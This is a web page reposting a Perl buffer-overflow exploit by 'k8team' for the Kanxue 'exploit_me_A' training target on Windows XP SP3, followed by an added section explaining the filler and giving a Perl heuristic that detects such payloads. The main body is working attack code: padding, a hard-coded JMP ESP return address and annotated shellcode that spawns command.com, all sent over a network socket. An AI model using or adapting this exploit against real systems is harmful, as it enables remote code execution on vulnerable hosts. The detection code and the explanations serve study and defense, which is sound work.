
[Overflow] Perl Kanxue exploit_me_A exploit by k8team

Author: 程力专用汽车股份有限公司  Source: www.dfclxwc.com (unknown)  Published: 2017-09-09 10:31:43
#!/usr/bin/perl
# Perl exploit_me_A exploit by k8team
# Date: 20131018
# Tested on: XPSP3

use strict;
use warnings;
use IO::Socket::INET;

if (scalar(@ARGV) != 2) { print "Usage: $0 host port\n"; exit; }

# Overwrites the saved return address with a JMP ESP in an XP SP3 system DLL (0x7FFA4512, little-endian)
my $JMPESP = "\x12\x45\xFA\x7F";

# Unused in this script: mov ecx / shr ecx,0x14 / sub esp,ecx / jmp esp, i.e. an
# "ESP minus 0x254, then jump" stub for shellcode placed before the return address
my $JMPback = "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4";

# shellcode: cmd, XP SP3 (absolute addresses are hard-coded, so it runs only there)
my $shellcode =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50" .             # push ebp / mov ebp,esp / zero 12 stack bytes
"\xC6\x45\xF4\x4D" .                             # write "MSVCRT.DLL" byte by byte at [ebp-0xC]
"\xC6\x45\xF5\x53" .
"\xC6\x45\xF6\x56" .
"\xC6\x45\xF7\x43" .
"\xC6\x45\xF8\x52" .
"\xC6\x45\xF9\x54" .
"\xC6\x45\xFA\x2E" .
"\xC6\x45\xFB\x44" .
"\xC6\x45\xFC\x4C" .
"\xC6\x45\xFD\x4C" .
"\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2" . # push its address, call 0x7C801D7B
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D" . # new frame; store "comm" at [ebp-0xC]
"\x89\x45\xF4\xB8\x61\x6E\x64\x2E" .             # "and." at [ebp-8]
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22" .             # "com\"" at [ebp-4]
"\x89\x45\xFC\x33\xD2\x88\x55\xFF" .             # overwrite the last byte with NUL -> "command.com"
"\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";  # push its address, call 0x77BF93C7

# Single-quoted vs double-quoted strings:
# in double quotes, "\x41" is escape-processed into the single byte A;
# in single quotes, '\x41' is not processed and is emitted literally as \x41, i.e. 4 bytes.
#my $a = '\x41' x 190 . "123456AAA2"; #
my $a = "\x41" x 190 . "123456AAA2";   # 190 + 10 = 200 bytes of filler before the return address

my $payload = $a . $JMPESP . $shellcode;

my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to connect!\n";

#print $payload;

sleep 1;
print $sock $payload;
print "Exploiting\n";
sleep 2;
print "Done\n";
close $sock;
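The comments in the script only state the quoting rule; the following is an added example (my code, not part of the original post or of k8team's script) that measures the two filler variants and, from the defender's side, applies a simple heuristic to a captured buffer: a long run of one byte followed within a few bytes by a little-endian dword in the XP-era system DLL address range, which is where the 0x7FFA4512 return address used above sits. The sample buffers, the 0xCC placeholder bytes standing in for the shellcode, the 64-byte run threshold, the 16-byte gap and the address range are all assumptions made for this example.

```perl
#!/usr/bin/perl
# Added example, not from the original post: quoting semantics behind the
# filler, plus a defender-side heuristic for payloads shaped like this one.
use strict;
use warnings;

# Build the filler both ways, as the original comments describe, and return
# the byte counts: double quotes process \x41 into one byte, single quotes do not.
sub filler_lengths {
    my $double = "\x41" x 190 . "123456AAA2";   # 190 + 10 = 200 bytes
    my $single = '\x41' x 190 . "123456AAA2";   # 190*4 + 10 = 770 bytes
    return (length $double, length $single);
}

# Heuristic: a run of at least $min_run identical bytes, followed within
# $max_gap bytes by a little-endian dword in the XP-era system DLL range
# (0x7C800000-0x7FFFFFFF), is the shape of a classic stack smash.
# Range, run length and gap are assumptions chosen for this example.
sub looks_like_stack_smash {
    my ($buf, $min_run, $max_gap) = @_;
    $min_run //= 64;
    $max_gap //= 16;
    my $n = length $buf;
    my $i = 0;
    while ($i < $n) {
        my $c = substr($buf, $i, 1);
        my $j = $i;
        $j++ while $j < $n && substr($buf, $j, 1) eq $c;
        my $run = $j - $i;
        if ($run >= $min_run) {
            for my $gap (0 .. $max_gap) {
                my $off = $j + $gap;
                last if $off + 4 > $n;
                my $addr = unpack('V', substr($buf, $off, 4));
                if ($addr >= 0x7C800000 && $addr <= 0x7FFFFFFF) {
                    return sprintf('%d x 0x%02X then 0x%08X at offset %d',
                                   $run, ord($c), $addr, $off);
                }
            }
        }
        $i = $j;
    }
    return;   # nothing suspicious
}

my ($dq, $sq) = filler_lengths();
print "filler: $dq bytes double-quoted, $sq bytes single-quoted\n";

# Constructed samples: the exploit-shaped one reuses the page's filler and
# return address but carries 0xCC placeholder bytes instead of shellcode.
my %samples = (
    'exploit-shaped'    => ("\x41" x 190 . "123456AAA2") . "\x12\x45\xFA\x7F" . ("\xCC" x 16),
    'long but harmless' => "A" x 300,
    'plain request'     => "GET / HTTP/1.0\r\n\r\n",
);
for my $name (sort keys %samples) {
    my $hit = looks_like_stack_smash($samples{$name});
    printf "%-18s %s\n", $name, defined $hit ? "FLAGGED ($hit)" : "clean";
}
```

The exploit-shaped sample is flagged as "190 x 0x41 then 0x7FFA4512 at offset 200", which is exactly the return-address slot the script fills; the 300-byte run with no address behind it and the ordinary request stay clean. The gap parameter exists because the script's filler ends in "123456AAA2", so the address is not directly adjacent to the run of A bytes.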
